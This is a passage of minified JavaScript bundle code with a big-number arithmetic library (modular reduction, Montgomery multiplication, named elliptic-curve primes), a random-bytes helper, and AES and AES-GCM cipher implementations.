P},K.prototype.mulp=function(v,P,G){var X=2*this.guessLen13b(v.length,P.length),L=this.makeRBT(X),h=this.stub(X),R=new Array(X),J=new Array(X),Z=new Array(X),ue=new Array(X),Ie=new Array(X),Ae=new Array(X),Ue=G.words;Ue.length=X,this.convert13b(v.words,v.length,R,X),this.convert13b(P.words,P.length,ue,X),this.transform(R,h,J,Z,X,L),this.transform(ue,h,Ie,Ae,X,L);for(var Xe=0;Xe<X;Xe++){var He=J[Xe]*Ie[Xe]-Z[Xe]*Ae[Xe];Z[Xe]=J[Xe]*Ae[Xe]+Z[Xe]*Ie[Xe],J[Xe]=He}return this.conjugate(J,Z,X),this.transform(J,Z,Ue,h,X,L),this.conjugate(Ue,h,X),this.normalize13b(Ue,X),G.negative=v.negative^P.negative,G.length=v.length+P.length,G._strip()},I.prototype.mul=function(v){var P=new I(null);return P.words=new Array(this.length+v.length),this.mulTo(v,P)},I.prototype.mulf=function(v){var P=new I(null);return P.words=new Array(this.length+v.length),U(this,v,P)},I.prototype.imul=function(v){return this.clone().mulTo(v,this)},I.prototype.imuln=function(v){var P=v<0;P&&(v=-v),$("number"==typeof v),$(v<67108864);for(var G=0,X=0;X<this.length;X++){var L=(0|this.words[X])*v,h=(67108863&L)+(67108863&G);G>>=26,G+=L/67108864|0,G+=h>>>26,this.words[X]=67108863&h}return 0!==G&&(this.words[X]=G,this.length++),P?this.ineg():this},I.prototype.muln=function(v){return this.clone().imuln(v)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(v){var P=function w(A){for(var v=new Array(A.bitLength()),P=0;P<v.length;P++)v[P]=A.words[P/26|0]>>>P%26&1;return v}(v);if(0===P.length)return new I(1);for(var G=this,X=0;X<P.length&&0===P[X];X++,G=G.sqr());if(++X<P.length)for(var L=G.sqr();X<P.length;X++,L=L.sqr())0!==P[X]&&(G=G.mul(L));return G},I.prototype.iushln=function(v){$("number"==typeof v&&v>=0);var L,P=v%26,G=(v-P)/26,X=67108863>>>26-P<<26-P;if(0!==P){var h=0;for(L=0;L<this.length;L++){var R=this.words[L]&X;this.words[L]=(0|this.words[L])-R<<P|h,h=R>>>26-P}h&&(this.words[L]=h,this.length++)}if(0!==G){for(L=this.length-1;L>=0;L--)this.words[L+G]=this.words[L];for(L=0;L<G;L++)this.words[L]=0;this.length+=G}return this._strip()},I.prototype.ishln=function(v){return $(0===this.negative),this.iushln(v)},I.prototype.iushrn=function(v,P,G){var X;$("number"==typeof v&&v>=0),X=P?(P-P%26)/26:0;var L=v%26,h=Math.min((v-L)/26,this.length),R=67108863^67108863>>>L<<L,J=G;if(X-=h,X=Math.max(0,X),J){for(var Z=0;Z<h;Z++)J.words[Z]=this.words[Z];J.length=h}if(0!==h)if(this.length>h)for(this.length-=h,Z=0;Z<this.length;Z++)this.words[Z]=this.words[Z+h];else this.words[0]=0,this.length=1;var ue=0;for(Z=this.length-1;Z>=0&&(0!==ue||Z>=X);Z--){var Ie=0|this.words[Z];this.words[Z]=ue<<26-L|Ie>>>L,ue=Ie&R}return J&&0!==ue&&(J.words[J.length++]=ue),0===this.length&&(this.words[0]=0,this.length=1),this._strip()},I.prototype.ishrn=function(v,P,G){return $(0===this.negative),this.iushrn(v,P,G)},I.prototype.shln=function(v){return this.clone().ishln(v)},I.prototype.ushln=function(v){return this.clone().iushln(v)},I.prototype.shrn=function(v){return this.clone().ishrn(v)},I.prototype.ushrn=function(v){return this.clone().iushrn(v)},I.prototype.testn=function(v){$("number"==typeof v&&v>=0);var P=v%26,G=(v-P)/26;return!(this.length<=G||!(this.words[G]&1<<P))},I.prototype.imaskn=function(v){$("number"==typeof v&&v>=0);var P=v%26,G=(v-P)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=G?this:(0!==P&&G++,this.length=Math.min(G,this.length),0!==P&&(this.words[this.length-1]&=67108863^67108863>>>P<<P),this._strip())},I.prototype.maskn=function(v){return this.clone().imaskn(v)},I.prototype.iaddn=function(v){return $("number"==typeof v),$(v<67108864),v<0?this.isubn(-v):0!==this.negative?1===this.length&&(0|this.words[0])<=v?(this.words[0]=v-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(v),this.negative=1,this):this._iaddn(v)},I.prototype._iaddn=function(v){this.words[0]+=v;for(var P=0;P<this.length&&this.words[P]>=67108864;P++)this.words[P]-=67108864,P===this.length-1?this.words[P+1]=1:this.words[P+1]++;return this.length=Math.max(this.length,P+1),this},I.prototype.isubn=function(v){if($("number"==typeof v),$(v<67108864),v<0)return this.iaddn(-v);if(0!==this.negative)return this.negative=0,this.iaddn(v),this.negative=1,this;if(this.words[0]-=v,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var P=0;P<this.length&&this.words[P]<0;P++)this.words[P]+=67108864,this.words[P+1]-=1;return this._strip()},I.prototype.addn=function(v){return this.clone().iaddn(v)},I.prototype.subn=function(v){return this.clone().isubn(v)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(v,P,G){var L;this._expand(v.length+G);var h,R=0;for(L=0;L<v.length;L++){h=(0|this.words[L+G])+R;var J=(0|v.words[L])*P;R=((h-=67108863&J)>>26)-(J/67108864|0),this.words[L+G]=67108863&h}for(;L<this.length-G;L++)R=(h=(0|this.words[L+G])+R)>>26,this.words[L+G]=67108863&h;if(0===R)return this._strip();for($(-1===R),R=0,L=0;L<this.length;L++)R=(h=-(0|this.words[L])+R)>>26,this.words[L]=67108863&h;return this.negative=1,this._strip()},I.prototype._wordDiv=function(v,P){var G,X=this.clone(),L=v,h=0|L.words[L.length-1];0!=(G=26-this._countBits(h))&&(L=L.ushln(G),X.iushln(G),h=0|L.words[L.length-1]);var Z,J=X.length-L.length;if("mod"!==P){(Z=new I(null)).length=J+1,Z.words=new Array(Z.length);for(var ue=0;ue<Z.length;ue++)Z.words[ue]=0}var Ie=X.clone()._ishlnsubmul(L,1,J);0===Ie.negative&&(X=Ie,Z&&(Z.words[J]=1));for(var Ae=J-1;Ae>=0;Ae--){var Ue=67108864*(0|X.words[L.length+Ae])+(0|X.words[L.length+Ae-1]);for(Ue=Math.min(Ue/h|0,67108863),X._ishlnsubmul(L,Ue,Ae);0!==X.negative;)Ue--,X.negative=0,X._ishlnsubmul(L,1,Ae),X.isZero()||(X.negative^=1);Z&&(Z.words[Ae]=Ue)}return Z&&Z._strip(),X._strip(),"div"!==P&&0!==G&&X.iushrn(G),{div:Z||null,mod:X}},I.prototype.divmod=function(v,P,G){return $(!v.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===v.negative?(h=this.neg().divmod(v,P),"mod"!==P&&(X=h.div.neg()),"div"!==P&&(L=h.mod.neg(),G&&0!==L.negative&&L.iadd(v)),{div:X,mod:L}):0===this.negative&&0!==v.negative?(h=this.divmod(v.neg(),P),"mod"!==P&&(X=h.div.neg()),{div:X,mod:h.mod}):0!=(this.negative&v.negative)?(h=this.neg().divmod(v.neg(),P),"div"!==P&&(L=h.mod.neg(),G&&0!==L.negative&&L.isub(v)),{div:h.div,mod:L}):v.length>this.length||this.cmp(v)<0?{div:new I(0),mod:this}:1===v.length?"div"===P?{div:this.divn(v.words[0]),mod:null}:"mod"===P?{div:null,mod:new I(this.modrn(v.words[0]))}:{div:this.divn(v.words[0]),mod:new I(this.modrn(v.words[0]))}:this._wordDiv(v,P);var X,L,h},I.prototype.div=function(v){return this.divmod(v,"div",!1).div},I.prototype.mod=function(v){return this.divmod(v,"mod",!1).mod},I.prototype.umod=function(v){return this.divmod(v,"mod",!0).mod},I.prototype.divRound=function(v){var P=this.divmod(v);if(P.mod.isZero())return P.div;var G=0!==P.div.negative?P.mod.isub(v):P.mod,X=v.ushrn(1),L=v.andln(1),h=G.cmp(X);return h<0||1===L&&0===h?P.div:0!==P.div.negative?P.div.isubn(1):P.div.iaddn(1)},I.prototype.modrn=function(v){var P=v<0;P&&(v=-v),$(v<=67108863);for(var G=(1<<26)%v,X=0,L=this.length-1;L>=0;L--)X=(G*X+(0|this.words[L]))%v;return P?-X:X},I.prototype.modn=function(v){return this.modrn(v)},I.prototype.idivn=function(v){var P=v<0;P&&(v=-v),$(v<=67108863);for(var G=0,X=this.length-1;X>=0;X--){var L=(0|this.words[X])+67108864*G;this.words[X]=L/v|0,G=L%v}return this._strip(),P?this.ineg():this},I.prototype.divn=function(v){return this.clone().idivn(v)},I.prototype.egcd=function(v){$(0===v.negative),$(!v.isZero());var P=this,G=v.clone();P=0!==P.negative?P.umod(v):P.clone();for(var X=new I(1),L=new I(0),h=new I(0),R=new I(1),J=0;P.isEven()&&G.isEven();)P.iushrn(1),G.iushrn(1),++J;for(var Z=G.clone(),ue=P.clone();!P.isZero();){for(var Ie=0,Ae=1;0==(P.words[0]&Ae)&&Ie<26;++Ie,Ae<<=1);if(Ie>0)for(P.iushrn(Ie);Ie-- >0;)(X.isOdd()||L.isOdd())&&(X.iadd(Z),L.isub(ue)),X.iushrn(1),L.iushrn(1);for(var Ue=0,Xe=1;0==(G.words[0]&Xe)&&Ue<26;++Ue,Xe<<=1);if(Ue>0)for(G.iushrn(Ue);Ue-- >0;)(h.isOdd()||R.isOdd())&&(h.iadd(Z),R.isub(ue)),h.iushrn(1),R.iushrn(1);P.cmp(G)>=0?(P.isub(G),X.isub(h),L.isub(R)):(G.isub(P),h.isub(X),R.isub(L))}return{a:h,b:R,gcd:G.iushln(J)}},I.prototype._invmp=function(v){$(0===v.negative),$(!v.isZero());var Ie,P=this,G=v.clone();P=0!==P.negative?P.umod(v):P.clone();for(var X=new I(1),L=new I(0),h=G.clone();P.cmpn(1)>0&&G.cmpn(1)>0;){for(var R=0,J=1;0==(P.words[0]&J)&&R<26;++R,J<<=1);if(R>0)for(P.iushrn(R);R-- >0;)X.isOdd()&&X.iadd(h),X.iushrn(1);for(var Z=0,ue=1;0==(G.words[0]&ue)&&Z<26;++Z,ue<<=1);if(Z>0)for(G.iushrn(Z);Z-- >0;)L.isOdd()&&L.iadd(h),L.iushrn(1);P.cmp(G)>=0?(P.isub(G),X.isub(L)):(G.isub(P),L.isub(X))}return(Ie=0===P.cmpn(1)?X:L).cmpn(0)<0&&Ie.iadd(v),Ie},I.prototype.gcd=function(v){if(this.isZero())return v.abs();if(v.isZero())return this.abs();var P=this.clone(),G=v.clone();P.negative=0,G.negative=0;for(var X=0;P.isEven()&&G.isEven();X++)P.iushrn(1),G.iushrn(1);for(;;){for(;P.isEven();)P.iushrn(1);for(;G.isEven();)G.iushrn(1);var L=P.cmp(G);if(L<0){var h=P;P=G,G=h}else if(0===L||0===G.cmpn(1))break;P.isub(G)}return G.iushln(X)},I.prototype.invm=function(v){return this.egcd(v).a.umod(v)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(v){return this.words[0]&v},I.prototype.bincn=function(v){$("number"==typeof v);var P=v%26,G=(v-P)/26,X=1<<P;if(this.length<=G)return this._expand(G+1),this.words[G]|=X,this;for(var L=X,h=G;0!==L&&h<this.length;h++){var R=0|this.words[h];L=(R+=L)>>>26,this.words[h]=R&=67108863}return 0!==L&&(this.words[h]=L,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(v){var G,P=v<0;if(0!==this.negative&&!P)return-1;if(0===this.negative&&P)return 1;if(this._strip(),this.length>1)G=1;else{P&&(v=-v),$(v<=67108863,"Number is too big");var X=0|this.words[0];G=X===v?0:X<v?-1:1}return 0!==this.negative?0|-G:G},I.prototype.cmp=function(v){if(0!==this.negative&&0===v.negative)return-1;if(0===this.negative&&0!==v.negative)return 1;var P=this.ucmp(v);return 0!==this.negative?0|-P:P},I.prototype.ucmp=function(v){if(this.length>v.length)return 1;if(this.length<v.length)return-1;for(var P=0,G=this.length-1;G>=0;G--){var X=0|this.words[G],L=0|v.words[G];if(X!==L){X<L?P=-1:X>L&&(P=1);break}}return P},I.prototype.gtn=function(v){return 1===this.cmpn(v)},I.prototype.gt=function(v){return 1===this.cmp(v)},I.prototype.gten=function(v){return this.cmpn(v)>=0},I.prototype.gte=function(v){return this.cmp(v)>=0},I.prototype.ltn=function(v){return-1===this.cmpn(v)},I.prototype.lt=function(v){return-1===this.cmp(v)},I.prototype.lten=function(v){return this.cmpn(v)<=0},I.prototype.lte=function(v){return this.cmp(v)<=0},I.prototype.eqn=function(v){return 0===this.cmpn(v)},I.prototype.eq=function(v){return 0===this.cmp(v)},I.red=function(v){return new l(v)},I.prototype.toRed=function(v){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),v.convertTo(this)._forceRed(v)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(v){return this.red=v,this},I.prototype.forceRed=function(v){return $(!this.red,"Already a number in reduction context"),this._forceRed(v)},I.prototype.redAdd=function(v){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,v)},I.prototype.redIAdd=function(v){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,v)},I.prototype.redSub=function(v){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,v)},I.prototype.redISub=function(v){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,v)},I.prototype.redShl=function(v){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,v)},I.prototype.redMul=function(v){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,v),this.red.mul(this,v)},I.prototype.redIMul=function(v){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,v),this.red.imul(this,v)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(v){return $(this.red&&!v.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,v)};var ee={k256:null,p224:null,p192:null,p25519:null};function se(A,v){this.name=A,this.p=new I(v,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function ve(){se.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function le(){se.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function ye(){se.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function z(){se.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function l(A){if("string"==typeof A){var v=I._prime(A);this.m=v.p,this.prime=v}else $(A.gtn(1),"modulus must be greater than 1"),this.m=A,this.prime=null}function f(A){l.call(this,A),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}se.prototype._tmp=function(){var v=new I(null);return v.words=new Array(Math.ceil(this.n/13)),v},se.prototype.ireduce=function(v){var G,P=v;do{this.split(P,this.tmp),G=(P=(P=this.imulK(P)).iadd(this.tmp)).bitLength()}while(G>this.n);var X=G<this.n?-1:P.ucmp(this.p);return 0===X?(P.words[0]=0,P.length=1):X>0?P.isub(this.p):void 0!==P.strip?P.strip():P._strip(),P},se.prototype.split=function(v,P){v.iushrn(this.n,0,P)},se.prototype.imulK=function(v){return v.imul(this.k)},ae(ve,se),ve.prototype.split=function(v,P){for(var G=4194303,X=Math.min(v.length,9),L=0;L<X;L++)P.words[L]=v.words[L];if(P.length=X,v.length<=9)return v.words[0]=0,void(v.length=1);var h=v.words[9];for(P.words[P.length++]=h&G,L=10;L<v.length;L++){var R=0|v.words[L];v.words[L-10]=(R&G)<<4|h>>>22,h=R}v.words[L-10]=h>>>=22,v.length-=0===h&&v.length>10?10:9},ve.prototype.imulK=function(v){v.words[v.length]=0,v.words[v.length+1]=0,v.length+=2;for(var P=0,G=0;G<v.length;G++){var X=0|v.words[G];v.words[G]=67108863&(P+=977*X),P=64*X+(P/67108864|0)}return 0===v.words[v.length-1]&&(v.length--,0===v.words[v.length-1]&&v.length--),v},ae(le,se),ae(ye,se),ae(z,se),z.prototype.imulK=function(v){for(var P=0,G=0;G<v.length;G++){var X=19*(0|v.words[G])+P,L=67108863&X;X>>>=26,v.words[G]=L,P=X}return 0!==P&&(v.words[v.length++]=P),v},I._prime=function(v){if(ee[v])return ee[v];var P;if("k256"===v)P=new ve;else if("p224"===v)P=new le;else if("p192"===v)P=new ye;else{if("p25519"!==v)throw new Error("Unknown prime "+v);P=new z}return ee[v]=P,P},l.prototype._verify1=function(v){$(0===v.negative,"red works only with positives"),$(v.red,"red works only with red numbers")},l.prototype._verify2=function(v,P){$(0==(v.negative|P.negative),"red works only with positives"),$(v.red&&v.red===P.red,"red works only with red numbers")},l.prototype.imod=function(v){return this.prime?this.prime.ireduce(v)._forceRed(this):(b(v,v.umod(this.m)._forceRed(this)),v)},l.prototype.neg=function(v){return v.isZero()?v.clone():this.m.sub(v)._forceRed(this)},l.prototype.add=function(v,P){this._verify2(v,P);var G=v.add(P);return G.cmp(this.m)>=0&&G.isub(this.m),G._forceRed(this)},l.prototype.iadd=function(v,P){this._verify2(v,P);var G=v.iadd(P);return G.cmp(this.m)>=0&&G.isub(this.m),G},l.prototype.sub=function(v,P){this._verify2(v,P);var G=v.sub(P);return G.cmpn(0)<0&&G.iadd(this.m),G._forceRed(this)},l.prototype.isub=function(v,P){this._verify2(v,P);var G=v.isub(P);return G.cmpn(0)<0&&G.iadd(this.m),G},l.prototype.shl=function(v,P){return this._verify1(v),this.imod(v.ushln(P))},l.prototype.imul=function(v,P){return this._verify2(v,P),this.imod(v.imul(P))},l.prototype.mul=function(v,P){return this._verify2(v,P),this.imod(v.mul(P))},l.prototype.isqr=function(v){return this.imul(v,v.clone())},l.prototype.sqr=function(v){return this.mul(v,v)},l.prototype.sqrt=function(v){if(v.isZero())return v.clone();var P=this.m.andln(3);if($(P%2==1),3===P){var G=this.m.add(new I(1)).iushrn(2);return this.pow(v,G)}for(var X=this.m.subn(1),L=0;!X.isZero()&&0===X.andln(1);)L++,X.iushrn(1);$(!X.isZero());var h=new I(1).toRed(this),R=h.redNeg(),J=this.m.subn(1).iushrn(1),Z=this.m.bitLength();for(Z=new I(2*Z*Z).toRed(this);0!==this.pow(Z,J).cmp(R);)Z.redIAdd(R);for(var ue=this.pow(Z,X),Ie=this.pow(v,X.addn(1).iushrn(1)),Ae=this.pow(v,X),Ue=L;0!==Ae.cmp(h);){for(var Xe=Ae,He=0;0!==Xe.cmp(h);He++)Xe=Xe.redSqr();$(He<Ue);var Be=this.pow(ue,new I(1).iushln(Ue-He-1));Ie=Ie.redMul(Be),ue=Be.redSqr(),Ae=Ae.redMul(ue),Ue=He}return Ie},l.prototype.invm=function(v){var P=v._invmp(this.m);return 0!==P.negative?(P.negative=0,this.imod(P).redNeg()):this.imod(P)},l.prototype.pow=function(v,P){if(P.isZero())return new I(1).toRed(this);if(0===P.cmpn(1))return v.clone();var X=new Array(16);X[0]=new I(1).toRed(this),X[1]=v;for(var L=2;L<X.length;L++)X[L]=this.mul(X[L-1],v);var h=X[0],R=0,J=0,Z=P.bitLength()%26;for(0===Z&&(Z=26),L=P.length-1;L>=0;L--){for(var ue=P.words[L],Ie=Z-1;Ie>=0;Ie--){var Ae=ue>>Ie&1;h!==X[0]&&(h=this.sqr(h)),0!==Ae||0!==R?(R<<=1,R|=Ae,(4==++J||0===L&&0===Ie)&&(h=this.mul(h,X[R]),J=0,R=0)):J=0}Z=26}return h},l.prototype.convertTo=function(v){var P=v.umod(this.m);return P===v?P.clone():P},l.prototype.convertFrom=function(v){var P=v.clone();return P.red=null,P},I.mont=function(v){return new f(v)},ae(f,l),f.prototype.convertTo=function(v){return this.imod(v.ushln(this.shift))},f.prototype.convertFrom=function(v){var P=this.imod(v.mul(this.rinv));return P.red=null,P},f.prototype.imul=function(v,P){if(v.isZero()||P.isZero())return v.words[0]=0,v.length=1,v;var G=v.imul(P),X=G.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),L=G.isub(X).iushrn(this.shift),h=L;return L.cmp(this.m)>=0?h=L.isub(this.m):L.cmpn(0)<0&&(h=L.iadd(this.m)),h._forceRed(this)},f.prototype.mul=function(v,P){if(v.isZero()||P.isZero())return new I(0)._forceRed(this);var G=v.mul(P),X=G.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),L=G.isub(X).iushrn(this.shift),h=L;return L.cmp(this.m)>=0?h=L.isub(this.m):L.cmpn(0)<0&&(h=L.iadd(this.m)),h._forceRed(this)},f.prototype.invm=function(v){return this.imod(v._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},9598:(Pe,we,de)=>{var ie;function j(ae){this.rand=ae}if(Pe.exports=function(I){return ie||(ie=new j(null)),ie.generate(I)},Pe.exports.Rand=j,j.prototype.generate=function(I){return this._rand(I)},j.prototype._rand=function(I){if(this.rand.getBytes)return this.rand.getBytes(I);for(var Q=new Uint8Array(I),F=0;F<Q.length;F++)Q[F]=this.rand.getByte();return Q},"object"==typeof self)self.crypto&&self.crypto.getRandomValues?j.prototype._rand=function(I){var Q=new Uint8Array(I);return self.crypto.getRandomValues(Q),Q}:self.msCrypto&&self.msCrypto.getRandomValues?j.prototype._rand=function(I){var Q=new Uint8Array(I);return self.msCrypto.getRandomValues(Q),Q}:"object"==typeof window&&(j.prototype._rand=function(){throw new Error("Not implemented yet")});else try{var $=de(9214);if("function"!=typeof $.randomBytes)throw new Error("Not supported");j.prototype._rand=function(I){return $.randomBytes(I)}}catch(ae){}},5461:(Pe,we,de)=>{var ie=de(265).Buffer;function j(E){ie.isBuffer(E)||(E=ie.from(E));for(var g=E.length/4|0,b=new Array(g),_=0;_<g;_++)b[_]=E.readUInt32BE(4*_);return b}function $(E){for(;0<E.length;E++)E[0]=0}function ae(E,g,b,_,y){for(var K,ee,se,ve,M=b[0],p=b[1],D=b[2],w=b[3],x=E[0]^g[0],S=E[1]^g[1],O=E[2]^g[2],U=E[3]^g[3],le=4,ye=1;ye<y;ye++)K=M[x>>>24]^p[S>>>16&255]^D[O>>>8&255]^w[255&U]^g[le++],ee=M[S>>>24]^p[O>>>16&255]^D[U>>>8&255]^w[255&x]^g[le++],se=M[O>>>24]^p[U>>>16&255]^D[x>>>8&255]^w[255&S]^g[le++],ve=M[U>>>24]^p[x>>>16&255]^D[S>>>8&255]^w[255&O]^g[le++],x=K,S=ee,O=se,U=ve;return K=(_[x>>>24]<<24|_[S>>>16&255]<<16|_[O>>>8&255]<<8|_[255&U])^g[le++],ee=(_[S>>>24]<<24|_[O>>>16&255]<<16|_[U>>>8&255]<<8|_[255&x])^g[le++],se=(_[O>>>24]<<24|_[U>>>16&255]<<16|_[x>>>8&255]<<8|_[255&S])^g[le++],ve=(_[U>>>24]<<24|_[x>>>16&255]<<16|_[S>>>8&255]<<8|_[255&O])^g[le++],[K>>>=0,ee>>>=0,se>>>=0,ve>>>=0]}var I=[0,1,2,4,8,16,32,64,128,27,54],Q=function(){for(var E=new Array(256),g=0;g<256;g++)E[g]=g<128?g<<1:g<<1^283;for(var b=[],_=[],y=[[],[],[],[]],M=[[],[],[],[]],p=0,D=0,w=0;w<256;++w){var x=D^D<<1^D<<2^D<<3^D<<4;b[p]=x=x>>>8^255&x^99,_[x]=p;var S=E[p],O=E[S],U=E[O],K=257*E[x]^16843008*x;y[0][p]=K<<24|K>>>8,y[1][p]=K<<16|K>>>16,y[2][p]=K<<8|K>>>24,y[3][p]=K,M[0][x]=(K=16843009*U^65537*O^257*S^16843008*p)<<24|K>>>8,M[1][x]=K<<16|K>>>16,M[2][x]=K<<8|K>>>24,M[3][x]=K,0===p?p=D=1:(p=S^E[E[E[U^S]]],D^=E[E[D]])}return{SBOX:b,INV_SBOX:_,SUB_MIX:y,INV_SUB_MIX:M}}();function F(E){this._key=j(E),this._reset()}F.blockSize=16,F.keySize=32,F.prototype.blockSize=F.blockSize,F.prototype.keySize=F.keySize,F.prototype._reset=function(){for(var E=this._key,g=E.length,b=g+6,_=4*(b+1),y=[],M=0;M<g;M++)y[M]=E[M];for(M=g;M<_;M++){var p=y[M-1];M%g==0?(p=Q.SBOX[(p=p<<8|p>>>24)>>>24]<<24|Q.SBOX[p>>>16&255]<<16|Q.SBOX[p>>>8&255]<<8|Q.SBOX[255&p],p^=I[M/g|0]<<24):g>6&&M%g==4&&(p=Q.SBOX[p>>>24]<<24|Q.SBOX[p>>>16&255]<<16|Q.SBOX[p>>>8&255]<<8|Q.SBOX[255&p]),y[M]=y[M-g]^p}for(var D=[],w=0;w<_;w++){var x=_-w,S=y[x-(w%4?0:4)];D[w]=w<4||x<=4?S:Q.INV_SUB_MIX[0][Q.SBOX[S>>>24]]^Q.INV_SUB_MIX[1][Q.SBOX[S>>>16&255]]^Q.INV_SUB_MIX[2][Q.SBOX[S>>>8&255]]^Q.INV_SUB_MIX[3][Q.SBOX[255&S]]}this._nRounds=b,this._keySchedule=y,this._invKeySchedule=D},F.prototype.encryptBlockRaw=function(E){return ae(E=j(E),this._keySchedule,Q.SUB_MIX,Q.SBOX,this._nRounds)},F.prototype.encryptBlock=function(E){var g=this.encryptBlockRaw(E),b=ie.allocUnsafe(16);return b.writeUInt32BE(g[0],0),b.writeUInt32BE(g[1],4),b.writeUInt32BE(g[2],8),b.writeUInt32BE(g[3],12),b},F.prototype.decryptBlock=function(E){var g=(E=j(E))[1];E[1]=E[3],E[3]=g;var b=ae(E,this._invKeySchedule,Q.INV_SUB_MIX,Q.INV_SBOX,this._nRounds),_=ie.allocUnsafe(16);return _.writeUInt32BE(b[0],0),_.writeUInt32BE(b[3],4),_.writeUInt32BE(b[2],8),_.writeUInt32BE(b[1],12),_},F.prototype.scrub=function(){$(this._keySchedule),$(this._invKeySchedule),$(this._key)},Pe.exports.AES=F},4661:(Pe,we,de)=>{var ie=de(5461),j=de(265).Buffer,$=de(4003),ae=de(2270),I=de(3486),Q=de(7110),F=de(7841);function b(_,y,M,p){$.call(this);var D=j.alloc(4,0);this._cipher=new ie.AES(y);var w=this._cipher.encryptBlock(D);this._ghash=new I(w),M=function g(_,y,M){if(12===y.length)return _._finID=j.concat([y,j.from([0,0,0,1])]),j.concat([y,j.from([0,0,0,2])]);var p=new I(M),D=y.length,w=D%16;p.update(y),w&&p.update(j.alloc(w=16-w,0)),p.update(j.alloc(8,0));var x=8*D,S=j.alloc(8);S.writeUIntBE(x,0,8),p.update(S),_._finID=p.state;var O=j.from(_._finID);return F(O),O}(this,M,w),this._prev=j.from(M),this._cache=j.allocUnsafe(0),this._secCache=j.allocUnsafe(0),this._decrypt=p,this._alen=0,this._len=0,this._mode=_,this._authTag=null,this._called=!1}ae(b,$),b.prototype._update=function(_){if(!this._called&&this._alen){var y=16-this._alen%16;y<16&&(y=j.alloc(y,0),this._ghash.update(y))}this._called=!0;var M=this._mode.encrypt(this,_);return this._ghash.update(this._decrypt?_:M),this._len+=_.length,M},b.prototype._final=function(){if(this._decrypt&&!this._authTag)throw new Error("Unsupported state or unable to authenticate data");var _=Q(this._ghash.final(8*this._alen,8*this._len),this._cipher.encryptBlock(this._finID));if(this._decrypt&&function E(_,y){var M=0;_.length!==y.length&&M++;for(var p=Math.min(_.length,y.length),D=0;D<p;++D)M+=_[D]^y[D];return M}(_,this._authTag))throw new Error("Unsupported state or unable to authenticate data");this._authTag=_,this._cipher.scrub()},b.prototype.getAuthTag=function(){if(this._decrypt||!j.isBuffer(this._authTag))throw new Error("Attempting to get auth tag in unsupported state");return this._authTag},b.prototype.setAuthTag=function(y){if(!this._decrypt)throw new Error("Attempting to set auth tag in unsupported state");this._authTag=y},b.prototype.setAAD=function(y){if(this._called)throw new Error("Attempting to set AAD in unsupported state");this._ghash.update(y),this._alen+=y.length},Pe.exports=b},8931:(Pe,we,de)=>{var ie=de(1835),j=de(7869),$=de(4946);we.createCipher=we.Cipher=ie.createCipher,we.createCipheriv=we.Cipheriv=ie.createCipheriv,we.createDecipher=we.Decipher=j.createDecipher,we.createDecipheriv=we.Decipheriv=j.createDecipheriv,we.listCiphers=we.getCiphers=function ae(){return Object.keys($)}},7869:(Pe,we,de)=>{var ie=de(4661),j=de(265).Buffer,$=de(848),ae=de(701),I=de(4003),Q=de(5461),F=de(1851);function g(p,D,w){I.call(this),this._cache=new b,this._last=void 0,this._cipher=new Q.AES(D),this._prev=j.from(w),this._mode=p,this._autopadding=!0}function b(){this.cache=j.allocUnsafe(0)}function y(p,D,w){var x=$[p.toLowerCase()];if(!x)throw new TypeError("invalid suite type");if("string"==typeof w&&(w=j.from(w)),"GCM"!==x.mode&&w.length!==x.iv)throw new TypeError("invalid iv length "+w.length);if("string"==typeof D&&(D=j.from(D)),D.length!==x.key/8)throw new TypeError("invalid key length "+D.length);return"stream"===x.type?new ae(x.module,D,w,!0):"auth"===x.type?new ie(x.module,D,w,!0):new g(x.module,D,w)}de(2270)(g,I),g.prototype._update=function(p){this._cache.add(p);for(var 